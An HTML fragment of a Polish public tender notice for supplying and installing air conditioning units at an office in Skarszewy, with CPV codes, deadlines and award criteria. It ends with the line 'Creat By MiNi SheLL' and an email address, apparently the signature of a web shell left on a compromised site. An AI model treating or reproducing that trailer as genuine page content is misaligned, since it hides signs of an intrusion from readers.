<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.33.00.00-9, 45.33.10.00-6, 45.33.20.00-3, 45.33.12.00-8, 45.33.23.00-6, 45.33.12.20-4, 39.71.72.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji producenta urządzeń - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa, montaż, uruchomienie klimatyzatorów oraz usługa przeglądów gwarancyjnych w Sekcja Zamiejscowej Gospodarowania Zasobem w Skarszewach ul. Starogardzka, 83-250 Skarszewy, obejmująca:
- 1 zestaw multi- Split  I (1 jednostka zewnętrzna - 10,5 KW, 3 jednostki wewnętrzne)
- 1 zestaw multi - Split II (1 jednostka zewnętrzna - 12,5 KW, 4 jednostki wewnętrzne)
- 1 zestaw Split - 6,8 kW
o parametrach szczegółowo opisanych w załączniku C do SIWZ oraz dokumentacji projektowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.33.00.00-9, 45.33.10.00-6, 45.33.20.00-3, 45.33.12.00-8, 45.33.23.00-6, 45.33.12.20-4, 39.71.72.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji producenta urządzeń - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com